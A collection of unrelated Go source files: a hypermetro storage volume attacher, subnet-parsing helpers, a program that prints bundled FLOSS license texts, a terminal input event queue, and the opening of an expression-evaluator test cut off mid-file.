		log.Errorf("Attach hypermetro remote volume %s error: %v", lunName, err)
		return "", err
	}
	lunWWN, err := p.localAttacher.ControllerAttach(lunName, parameters)
	if err != nil {
		log.Errorf("Attach hypermetro local volume %s error: %v", lunName, err)
		// Fix: the rollback's error was silently discarded; log it so a
		// leaked remote attachment is visible, but still return the
		// original attach error.
		if _, detachErr := p.remoteAttacher.ControllerDetach(lunName, parameters); detachErr != nil {
			log.Warningf("Rollback detach of hypermetro remote volume %s error: %v", lunName, detachErr)
		}
		return "", err
	}
	return lunWWN, nil
}
// ControllerDetach detaches the LUN from the remote array first, then from
// the local array, and returns the local LUN WWN.
func (p *MetroAttacher) ControllerDetach(lunName string, parameters map[string]interface{}) (string, error) {
	_, err := p.remoteAttacher.ControllerDetach(lunName, parameters)
	if err != nil {
		log.Errorf("Detach hypermetro remote volume %s error: %v", lunName, err)
		return "", err
	}
	lunWWN, err := p.localAttacher.ControllerDetach(lunName, parameters)
	if err != nil {
		log.Errorf("Detach hypermetro local volume %s error: %v", lunName, err)
		return "", err
	}
	return lunWWN, nil
}
// getTargetISCSIPortals returns the iSCSI portals of the local array
// followed by those of the remote array.
func (p *MetroAttacher) getTargetISCSIPortals() ([]string, error) {
	localPortals, err := p.localAttacher.getTargetISCSIPortals()
	if err != nil {
		return nil, err
	}
	remotePortals, err := p.remoteAttacher.getTargetISCSIPortals()
	if err != nil {
		return nil, err
	}
	// Build a fresh slice so neither attacher's backing array is aliased.
	portals := make([]string, 0, len(localPortals)+len(remotePortals))
	portals = append(portals, localPortals...)
	portals = append(portals, remotePortals...)
	return portals, nil
}
// getTargetRoCEPortals returns the RoCE portals of the local array
// followed by those of the remote array.
func (p *MetroAttacher) getTargetRoCEPortals() ([]string, error) {
	localPortals, err := p.localAttacher.getTargetRoCEPortals()
	if err != nil {
		return nil, err
	}
	remotePortals, err := p.remoteAttacher.getTargetRoCEPortals()
	if err != nil {
		return nil, err
	}
	// Build a fresh slice so neither attacher's backing array is aliased.
	portals := make([]string, 0, len(localPortals)+len(remotePortals))
	portals = append(portals, localPortals...)
	portals = append(portals, remotePortals...)
	return portals, nil
}
|
package ssubnetting
import (
"sort"
"strconv"
"strings"
"os"
)
// FillArr writes v into arr at every index in the half-open range
// [begin, end). Indices outside 0..3 will panic, as with any array access.
func FillArr(arr *[4]int, v, begin, end int) {
	for idx := begin; idx < end; idx++ {
		arr[idx] = v
	}
}
// SortMasks sorts the network masks in place: "desc" produces ascending
// order and "asc" produces descending order; any other value is a no-op.
// (Original comment had a typo: "ascendente o ascendente".)
// NOTE(review): the type labels look inverted relative to the order they
// produce — confirm against callers before renaming them. Behavior kept.
func SortMasks(masks []int, typ string) {
	switch typ {
	case "desc":
		sort.Ints(masks)
	case "asc":
		// Go's switch does not fall through, so no break statements needed.
		sort.Sort(sort.Reverse(sort.IntSlice(masks)))
	}
}
// CopyAddr copies the four octets of soucre into dest.
// Go arrays are values, so a single assignment copies all elements.
func CopyAddr(soucre [4]int, dest *[4]int) {
	*dest = soucre
}
// ParseAddr parses a dotted-quad string "x1.x2.x3.x4" into its four integer
// octets. The boolean result is false when the string does not consist of
// exactly four dot-separated integers.
// Note: octet values are not range-checked (anything strconv.Atoi accepts
// passes), matching the original behavior.
func ParseAddr(addr string) ([4]int, bool) {
	var intAddr [4]int
	sepAddr := strings.Split(addr, ".")
	// Fix: the original indexed intAddr with the raw field count, panicking
	// on inputs with more than four fields and silently accepting fewer.
	if len(sepAddr) != 4 {
		return intAddr, false
	}
	for i, field := range sepAddr {
		octet, err := strconv.Atoi(field)
		if err != nil {
			return intAddr, false
		}
		intAddr[i] = octet
	}
	return intAddr, true
}
// StrToSeqOfInt splits req on sep and converts each piece to an int.
// The boolean result is false when any piece fails to parse; in that case
// the returned slice holds the values converted so far.
func StrToSeqOfInt(req string, sep string) ([]int, bool) {
	parts := strings.Split(req, sep)
	nums := make([]int, len(parts))
	for i, part := range parts {
		n, convErr := strconv.Atoi(part)
		if convErr != nil {
			return nums, false
		}
		nums[i] = n
	}
	return nums, true
}
//Obtene lo que haya después de un argumento de línea de comandos.
func GetFlagValue(f string) (string, bool) {
var r string
flg := false
flgExists := false
first := true
l := len(os.Args)
for i := 0; i < l; i++ {
if os.Args[i] == f {
flg = true
flgExists = true
} else if flg && os.Args[i][0] != '-' {
if first {
r += os.Args[i]
first = false
} else {
r += " " + os.Args[i]
}
} else if(flg && os.Args[i][0] == '-') {
break
}
}
return r, flgExists
}
|
/*
The MIT License (MIT)
Copyright (c) 2015 tSURooT <tsu.root@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
package main
import (
"fmt"
)
// showLicenses prints the bundled third-party FLOSS license texts
// (allLicenseText) to stdout, preceded by a section header.
func showLicenses() {
	fmt.Println("FLOSS Licenses")
	fmt.Println("----------------------------------------------------------------")
	fmt.Println(allLicenseText)
}
var allLicenseText = `anaconda Copyright (c) 2013 Aditya Mukerjee, Quotidian Ventures
https://github.com/ChimeraCoder/anaconda
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files(the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE
----------------------------------------------------------------
Go-OAuth Copyright (c) 2010 Gary Burd
https://github.com/garyburd/go-oauth
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
"Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
You must give any other recipients of the Work or Derivative Works a copy of this License; and
You must cause any modified files to carry prominent notices stating that You changed the files; and
You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
----------------------------------------------------------------
tokenbucket Copyright (c) ChimeraCoder
https://github.com/ChimeraCoder/tokenbucket
GNU LESSER GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
This version of the GNU Lesser General Public License incorporates
the terms and conditions of version 3 of the GNU General Public
License, supplemented by the additional permissions listed below.
0. Additional Definitions.
As used herein, "this License" refers to version 3 of the GNU Lesser
General Public License, and the "GNU GPL" refers to version 3 of the GNU
General Public License.
"The Library" refers to a covered work governed by this License,
other than an Application or a Combined Work as defined below.
An "Application" is any work that makes use of an interface provided
by the Library, but which is not otherwise based on the Library.
Defining a subclass of a class defined by the Library is deemed a mode
of using an interface provided by the Library.
A "Combined Work" is a work produced by combining or linking an
Application with the Library. The particular version of the Library
with which the Combined Work was made is also called the "Linked
Version".
The "Minimal Corresponding Source" for a Combined Work means the
Corresponding Source for the Combined Work, excluding any source code
for portions of the Combined Work that, considered in isolation, are
based on the Application, and not on the Linked Version.
The "Corresponding Application Code" for a Combined Work means the
object code and/or source code for the Application, including any data
and utility programs needed for reproducing the Combined Work from the
Application, but excluding the System Libraries of the Combined Work.
1. Exception to Section 3 of the GNU GPL.
You may convey a covered work under sections 3 and 4 of this License
without being bound by section 3 of the GNU GPL.
2. Conveying Modified Versions.
If you modify a copy of the Library, and, in your modifications, a
facility refers to a function or data to be supplied by an Application
that uses the facility (other than as an argument passed when the
facility is invoked), then you may convey a copy of the modified
version:
a) under this License, provided that you make a good faith effort to
ensure that, in the event an Application does not supply the
function or data, the facility still operates, and performs
whatever part of its purpose remains meaningful, or
b) under the GNU GPL, with none of the additional permissions of
this License applicable to that copy.
3. Object Code Incorporating Material from Library Header Files.
The object code form of an Application may incorporate material from
a header file that is part of the Library. You may convey such object
code under terms of your choice, provided that, if the incorporated
material is not limited to numerical parameters, data structure
layouts and accessors, or small macros, inline functions and templates
(ten or fewer lines in length), you do both of the following:
a) Give prominent notice with each copy of the object code that the
Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the object code with a copy of the GNU GPL and this license
document.
4. Combined Works.
You may convey a Combined Work under terms of your choice that,
taken together, effectively do not restrict modification of the
portions of the Library contained in the Combined Work and reverse
engineering for debugging such modifications, if you also do each of
the following:
a) Give prominent notice with each copy of the Combined Work that
the Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the Combined Work with a copy of the GNU GPL and this license
document.
c) For a Combined Work that displays copyright notices during
execution, include the copyright notice for the Library among
these notices, as well as a reference directing the user to the
copies of the GNU GPL and this license document.
d) Do one of the following:
0) Convey the Minimal Corresponding Source under the terms of this
License, and the Corresponding Application Code in a form
suitable for, and under terms that permit, the user to
recombine or relink the Application with a modified version of
the Linked Version to produce a modified Combined Work, in the
manner specified by section 6 of the GNU GPL for conveying
Corresponding Source.
1) Use a suitable shared library mechanism for linking with the
Library. A suitable mechanism is one that (a) uses at run time
a copy of the Library already present on the user's computer
system, and (b) will operate properly with a modified version
of the Library that is interface-compatible with the Linked
Version.
e) Provide Installation Information, but only if you would otherwise
be required to provide such information under section 6 of the
GNU GPL, and only to the extent that such information is
necessary to install and execute a modified version of the
Combined Work produced by recombining or relinking the
Application with a modified version of the Linked Version. (If
you use option 4d0, the Installation Information must accompany
the Minimal Corresponding Source and Corresponding Application
Code. If you use option 4d1, you must provide the Installation
Information in the manner specified by section 6 of the GNU GPL
for conveying Corresponding Source.)
5. Combined Libraries.
You may place library facilities that are a work based on the
Library side by side in a single library together with other library
facilities that are not Applications and are not covered by this
License, and convey such a combined library under terms of your
choice, if you do both of the following:
a) Accompany the combined library with a copy of the same work based
on the Library, uncombined with any other library facilities,
conveyed under the terms of this License.
b) Give prominent notice with the combined library that part of it
is a work based on the Library, and explaining where to find the
accompanying uncombined form of the same work.
6. Revised Versions of the GNU Lesser General Public License.
The Free Software Foundation may publish revised and/or new versions
of the GNU Lesser General Public License from time to time. Such new
versions will be similar in spirit to the present version, but may
differ in detail to address new problems or concerns.
Each version is given a distinguishing version number. If the
Library as you received it specifies that a certain numbered version
of the GNU Lesser General Public License "or any later version"
applies to it, you have the option of following the terms and
conditions either of that published version or of any later version
published by the Free Software Foundation. If the Library as you
received it does not specify a version number of the GNU Lesser
General Public License, you may choose any version of the GNU Lesser
General Public License ever published by the Free Software Foundation.
If the Library as you received it specifies that a proxy can decide
whether future versions of the GNU Lesser General Public License shall
apply, that proxy's public statement of acceptance of any version is
permanent authorization for you to choose that version for the
Library.
----------------------------------------------------------------
go-yaml
gopkg.in/yaml.v2
Copyright (c) 2011-2014 - Canonical Inc.
This software is licensed under the LGPLv3, included below.
As a special exception to the GNU Lesser General Public License version 3
("LGPL3"), the copyright holders of this Library give you permission to
convey to a third party a Combined Work that links statically or dynamically
to this Library without providing any Minimal Corresponding Source or
Minimal Application Code as set out in 4d or providing the installation
information set out in section 4e, provided that you comply with the other
provisions of LGPL3 and provided that you meet, for the Application the
terms and conditions of the license(s) which apply to the Application.
Except as stated in this special exception, the provisions of LGPL3 will
continue to comply in full to this Library. If you modify this Library, you
may apply this exception to your version of this Library, but you are not
obliged to do so. If you do not wish to do so, delete this exception
statement from your version. This exception does not (and cannot) modify any
license terms which apply to the Application, with which you must still
comply.
GNU LESSER GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
This version of the GNU Lesser General Public License incorporates
the terms and conditions of version 3 of the GNU General Public
License, supplemented by the additional permissions listed below.
0. Additional Definitions.
As used herein, "this License" refers to version 3 of the GNU Lesser
General Public License, and the "GNU GPL" refers to version 3 of the GNU
General Public License.
"The Library" refers to a covered work governed by this License,
other than an Application or a Combined Work as defined below.
An "Application" is any work that makes use of an interface provided
by the Library, but which is not otherwise based on the Library.
Defining a subclass of a class defined by the Library is deemed a mode
of using an interface provided by the Library.
A "Combined Work" is a work produced by combining or linking an
Application with the Library. The particular version of the Library
with which the Combined Work was made is also called the "Linked
Version".
The "Minimal Corresponding Source" for a Combined Work means the
Corresponding Source for the Combined Work, excluding any source code
for portions of the Combined Work that, considered in isolation, are
based on the Application, and not on the Linked Version.
The "Corresponding Application Code" for a Combined Work means the
object code and/or source code for the Application, including any data
and utility programs needed for reproducing the Combined Work from the
Application, but excluding the System Libraries of the Combined Work.
1. Exception to Section 3 of the GNU GPL.
You may convey a covered work under sections 3 and 4 of this License
without being bound by section 3 of the GNU GPL.
2. Conveying Modified Versions.
If you modify a copy of the Library, and, in your modifications, a
facility refers to a function or data to be supplied by an Application
that uses the facility (other than as an argument passed when the
facility is invoked), then you may convey a copy of the modified
version:
a) under this License, provided that you make a good faith effort to
ensure that, in the event an Application does not supply the
function or data, the facility still operates, and performs
whatever part of its purpose remains meaningful, or
b) under the GNU GPL, with none of the additional permissions of
this License applicable to that copy.
3. Object Code Incorporating Material from Library Header Files.
The object code form of an Application may incorporate material from
a header file that is part of the Library. You may convey such object
code under terms of your choice, provided that, if the incorporated
material is not limited to numerical parameters, data structure
layouts and accessors, or small macros, inline functions and templates
(ten or fewer lines in length), you do both of the following:
a) Give prominent notice with each copy of the object code that the
Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the object code with a copy of the GNU GPL and this license
document.
4. Combined Works.
You may convey a Combined Work under terms of your choice that,
taken together, effectively do not restrict modification of the
portions of the Library contained in the Combined Work and reverse
engineering for debugging such modifications, if you also do each of
the following:
a) Give prominent notice with each copy of the Combined Work that
the Library is used in it and that the Library and its use are
covered by this License.
b) Accompany the Combined Work with a copy of the GNU GPL and this license
document.
c) For a Combined Work that displays copyright notices during
execution, include the copyright notice for the Library among
these notices, as well as a reference directing the user to the
copies of the GNU GPL and this license document.
d) Do one of the following:
0) Convey the Minimal Corresponding Source under the terms of this
License, and the Corresponding Application Code in a form
suitable for, and under terms that permit, the user to
recombine or relink the Application with a modified version of
the Linked Version to produce a modified Combined Work, in the
manner specified by section 6 of the GNU GPL for conveying
Corresponding Source.
1) Use a suitable shared library mechanism for linking with the
Library. A suitable mechanism is one that (a) uses at run time
a copy of the Library already present on the user's computer
system, and (b) will operate properly with a modified version
of the Library that is interface-compatible with the Linked
Version.
e) Provide Installation Information, but only if you would otherwise
be required to provide such information under section 6 of the
GNU GPL, and only to the extent that such information is
necessary to install and execute a modified version of the
Combined Work produced by recombining or relinking the
Application with a modified version of the Linked Version. (If
you use option 4d0, the Installation Information must accompany
the Minimal Corresponding Source and Corresponding Application
Code. If you use option 4d1, you must provide the Installation
Information in the manner specified by section 6 of the GNU GPL
for conveying Corresponding Source.)
5. Combined Libraries.
You may place library facilities that are a work based on the
Library side by side in a single library together with other library
facilities that are not Applications and are not covered by this
License, and convey such a combined library under terms of your
choice, if you do both of the following:
a) Accompany the combined library with a copy of the same work based
on the Library, uncombined with any other library facilities,
conveyed under the terms of this License.
b) Give prominent notice with the combined library that part of it
is a work based on the Library, and explaining where to find the
accompanying uncombined form of the same work.
6. Revised Versions of the GNU Lesser General Public License.
The Free Software Foundation may publish revised and/or new versions
of the GNU Lesser General Public License from time to time. Such new
versions will be similar in spirit to the present version, but may
differ in detail to address new problems or concerns.
Each version is given a distinguishing version number. If the
Library as you received it specifies that a certain numbered version
of the GNU Lesser General Public License "or any later version"
applies to it, you have the option of following the terms and
conditions either of that published version or of any later version
published by the Free Software Foundation. If the Library as you
received it does not specify a version number of the GNU Lesser
General Public License, you may choose any version of the GNU Lesser
General Public License ever published by the Free Software Foundation.
If the Library as you received it specifies that a proxy can decide
whether future versions of the GNU Lesser General Public License shall
apply, that proxy's public statement of acceptance of any version is
permanent authorization for you to choose that version for the
Library.`
|
package platform
import (
"fmt"
"image"
"log"
"unicode/utf8"
"github.com/jcorbin/anansi"
"github.com/jcorbin/anansi/ansi"
)
// Events holds a queue of input events that were available at the start of the
// current frame's time window.
//
// The four slices are parallel arrays indexed by event id: Type classifies
// each entry, while esc, arg, and mouse carry that entry's payload. Consumers
// "strike out" handled events by setting their Type back to EventNone.
type Events struct {
	Type  []EventType
	esc   []ansi.Escape
	arg   [][]byte
	mouse []Mouse
}

// EventType is the type of an entry in Events.
type EventType uint8

// Type constants for Events.
const (
	EventNone   EventType = iota // empty or struck-out slot
	EventEscape                  // ansi escape sequence; payload via Events.Escape
	EventRune                    // plain rune input; payload via Events.Rune
	EventMouse                   // mouse event; payload via Events.Mouse
)

// Escape represents ansi escape sequence data stored in an Events queue.
type Escape struct {
	ID  ansi.Escape
	Arg []byte
}

// Mouse represents mouse data stored in an Events queue.
type Mouse struct {
	State ansi.MouseState
	ansi.Point
}

// ZM is a convenience name for the zero value of Mouse.
var ZM Mouse
// Empty returns true if there are no non-EventNone typed events left in the
// queue (every remaining entry has been struck out, or the queue is empty).
func (es *Events) Empty() bool {
	for _, kind := range es.Type {
		if kind != EventNone {
			return false
		}
	}
	return true
}
// HasTerminal reports whether the given terminal rune is in the event queue.
// If found, that event and every event after it are struck out (set to
// EventNone) before returning true.
func (es *Events) HasTerminal(r rune) bool {
	target := ansi.Escape(r)
	for i, kind := range es.Type {
		if kind != EventRune || es.esc[i] != target {
			continue
		}
		// Strike the match and truncate everything after it.
		for j := i; j < len(es.Type); j++ {
			es.Type[j] = EventNone
		}
		return true
	}
	return false
}
// CountRune counts occurrences of any of the given runes, striking each
// matched event out. A rune repeated in rs is counted once per repetition,
// as in the original implementation (no break on first match).
func (es *Events) CountRune(rs ...rune) (n int) {
	for i, kind := range es.Type {
		if kind != EventRune {
			continue
		}
		for _, r := range rs {
			if es.esc[i] == ansi.Escape(r) {
				es.Type[i] = EventNone
				n++
			}
		}
	}
	return n
}
// CountPressesIn counts mouse presses of the given button within the given
// rectangle, striking each counted press out.
func (es *Events) CountPressesIn(box ansi.Rectangle, buttonID uint8) (n int) {
	for id, kind := range es.Type {
		if kind != EventMouse {
			continue
		}
		sid, pressed := es.mouse[id].State.IsPress()
		if pressed && sid == buttonID && es.mouse[id].Point.In(box) {
			n++
			es.Type[id] = EventNone
		}
	}
	return n
}
// AnyPressesOutside returns true if there are any mouse presses outside the
// given rectangle. No events are struck out.
func (es *Events) AnyPressesOutside(box ansi.Rectangle) bool {
	for id, kind := range es.Type {
		if kind != EventMouse {
			continue
		}
		if _, pressed := es.mouse[id].State.IsPress(); !pressed {
			continue
		}
		if !es.mouse[id].Point.In(box) {
			return true
		}
	}
	return false
}
// TotalScrollIn counts total mouse scroll delta within the given rectangle,
// striking out all such wheel events. Wheel-up (button 4) decrements the
// delta; wheel-down (button 5) increments it.
func (es *Events) TotalScrollIn(box ansi.Rectangle) (n int) {
	for id, kind := range es.Type {
		if kind != EventMouse || !es.mouse[id].Point.In(box) {
			continue
		}
		switch es.mouse[id].State.ButtonID() {
		case 4: // wheel-up
			es.Type[id] = EventNone
			n--
		case 5: // wheel-down
			es.Type[id] = EventNone
			n++
		}
	}
	return n
}
// TotalCursorMovement returns the total cursor movement delta (e.g. from
// arrow keys), striking out all such cursor movement events. Does not
// recognize cursor line movements (CNL and CPL).
func (es *Events) TotalCursorMovement() (move image.Point) {
	for id, kind := range es.Type {
		if kind != EventEscape {
			continue
		}
		if d, isMove := ansi.DecodeCursorCardinal(es.esc[id], es.arg[id]); isMove {
			es.Type[id] = EventNone
			move = move.Add(d)
		}
	}
	return move
}
// LastMouse returns the last mouse event in the queue, if any. When consume
// is true, every mouse event (including the returned one!) is struck out.
func (es *Events) LastMouse(consume bool) (m Mouse, have bool) {
	for id, kind := range es.Type {
		if kind != EventMouse {
			continue
		}
		m, have = es.mouse[id], true
		if consume {
			es.Type[id] = EventNone
		}
	}
	return m, have
}
// String formats the escape as "<id> <arg-bytes>".
func (e Escape) String() string { return fmt.Sprintf("%v %s", e.ID, e.Arg) }

// String formats the mouse event as "<state>@<point>".
func (m Mouse) String() string { return fmt.Sprintf("%v@%v", m.State, m.Point) }

// Escape returns any ansi escape sequence data for the given event id.
func (es *Events) Escape(id int) Escape { return Escape{es.esc[id], es.arg[id]} }

// Mouse returns any mouse event data for the given event id.
func (es *Events) Mouse(id int) Mouse { return es.mouse[id] }

// Rune returns the event's rune (maybe an ansi.Escape PUA range rune).
func (es *Events) Rune(id int) rune { return rune(es.esc[id]) }
// Clear the event queue, retaining the backing storage of all four parallel
// slices for reuse.
func (es *Events) Clear() {
	es.Type, es.esc, es.arg, es.mouse = es.Type[:0], es.esc[:0], es.arg[:0], es.mouse[:0]
}
// DecodeBytes parses events from the given byte slice; useful for replays
// and testing. Bytes not recognized as an escape sequence are decoded as
// plain runes.
func (es *Events) DecodeBytes(b []byte) {
	for len(b) > 0 {
		e, a, n := ansi.DecodeEscape(b)
		b = b[n:]
		if e == 0 {
			// Not an escape: consume a single rune instead.
			var r rune
			r, n = utf8.DecodeRune(b)
			b = b[n:]
			e = ansi.Escape(r)
		}
		es.add(e, a)
	}
}
// DecodeInput decodes all input currently read into the given input.
func (es *Events) DecodeInput(in *anansi.Input) {
	for {
		e, a, ok := in.Decode()
		if !ok {
			return
		}
		es.add(e, a)
	}
}
// add appends one decoded event to the queue, classifying it as an escape,
// a plain rune, or (for xterm extended mouse reports) a mouse event. All
// four parallel slices are appended to so event ids stay aligned.
func (es *Events) add(e ansi.Escape, a []byte) {
	kind := EventEscape
	m := Mouse{}
	if !e.IsEscape() {
		kind = EventRune
	}
	switch e {
	case ansi.CSI('M'), ansi.CSI('m'):
		// Xterm extended mouse report.
		var err error
		if m.State, m.Point, err = ansi.DecodeXtermExtendedMouse(e, a); err != nil {
			// Keep the raw escape queued; just log the decode failure.
			log.Printf("mouse control: decode error %v %s : %v", e, a, err)
		} else if m.State != 0 || m.Point.Valid() {
			kind = EventMouse
		}
	}
	es.Type = append(es.Type, kind)
	es.esc = append(es.esc, e)
	es.arg = append(es.arg, a)
	es.mouse = append(es.mouse, m)
}
|
/*
* Copyright 2017 StreamSets Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package el
import (
"fmt"
"strings"
"testing"
)
// EvaluationTest describes a single expression-evaluation test case.
type EvaluationTest struct {
	Name       string                 // case name; also used as the evaluator name
	Expression string                 // expression under test
	Parameters map[string]interface{} // parameters made available to the expression
	Expected   interface{}            // expected result, or expected error substring when ErrorCase is true
	ErrorCase  bool                   // true when evaluation is expected to fail
}
// TestSimpleExpression exercises the evaluator with empty, literal,
// parameterised and error-producing expressions.
func TestSimpleExpression(test *testing.T) {
	evaluationTests := []EvaluationTest{
		{
			Name:       "Test empty expression",
			Expression: "",
			Expected:   "",
		},
		{
			Name:       "Test string value",
			Expression: "'sample'",
			Expected:   "sample",
		},
		{
			Name:       "Test number value",
			Expression: "10",
			// Numbers come back as float64 from the evaluator.
			Expected: float64(10),
		},
		{
